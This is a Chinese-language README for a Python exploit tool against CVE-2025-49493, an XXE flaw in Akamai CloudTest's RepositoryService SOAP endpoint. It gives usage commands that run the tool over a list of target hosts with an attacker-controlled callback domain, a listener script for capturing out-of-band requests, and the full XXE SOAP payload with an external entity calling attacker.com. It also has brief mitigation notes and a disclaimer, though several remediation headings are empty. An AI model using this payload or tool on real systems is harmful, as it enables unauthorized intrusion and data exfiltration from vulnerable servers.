这是一个基于 Python 的漏洞利用程序,针对 CVE-2025-49493,该漏洞影响 60 2025.06.02 (12988) 之前的 Akamai CloudTest 版本。该漏洞允许通过 SOAP 服务端点进行 XML 外部实体 (XXE) 注入。
该漏洞存在于 /concerto/services/RepositoryService SOAP 端点中,该端点处理 XML 输入时未对外部实体进行适当的清理。攻击者可以构造恶意 XML 载荷来触发 XXE 攻击,可能导致以下后果:
安装所需包:
pip install -r requirements.txt
或手动安装:
pip install requests urllib3 colored pyfiglet
python main.py targets.txt xxe.attacker.com
# With custom timeout
python main.py targets.txt collaborator.burp.com --timeout 20
# Using interactsh for OOB detection
python main.py targets.txt attacker.interactsh.com
positional arguments:
targets Target file containing list of Akamai CloudTest hosts
xxe_server XXE server to capture requests (e.g., attacker.com or IP)
optional arguments:
-h, --help show this help message and exit
--timeout TIMEOUT Request timeout in seconds (default: 10)
创建一个 targets.txt 文件,每行一个目标:
https://example-cloudtest.akamai.com
https://demo-cloudtest.example.com
https://test-cloudtest.internal.company.com
https://cloudtest.example.org
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latestinteractsh-client设置一个简单的 HTTP 服务器以捕获请求:
# simple_server.py
import http.server
import socketserver
class RequestHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
print(f"XXE Request received: {self.path}")
print(f"Headers: {self.headers}")
super().do_GET()
with socketserver.TCPServer(("", 8000), RequestHandler) as httpd:
print("Server running on port 8000")
httpd.serve_forever()
该漏洞利用程序使用以下 XXE 载荷结构:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
<!ENTITY xxe SYSTEM "http://attacker.com">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:rep="http://example.com/services/repository">
<soapenv:Header/>
<soapenv:Body>
<rep:getUIBundleObjectXml>
<rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
</rep:getUIBundleObjectXml>
</soapenv:Body>
</soapenv:Envelope>
立即行动:
长期解决方案:
安全的 XML 处理:
# Disable external entities in XML parsers
import xml.etree.ElementTree as ET
parser = ET.XMLParser()
parser.parser.DefaultHandler = lambda data: None
parser.parser.ExternalEntityRefHandler = lambda *args: False
输入验证:
本工具仅用于教育和授权测试目的。用户有责任确保在测试任何系统之前获得适当授权。作者不对因使用本工具而造成的任何误用或损害负责。
本项目采用 MIT 许可证授权 - 有关详细信息,请参阅 LICENSE 文件。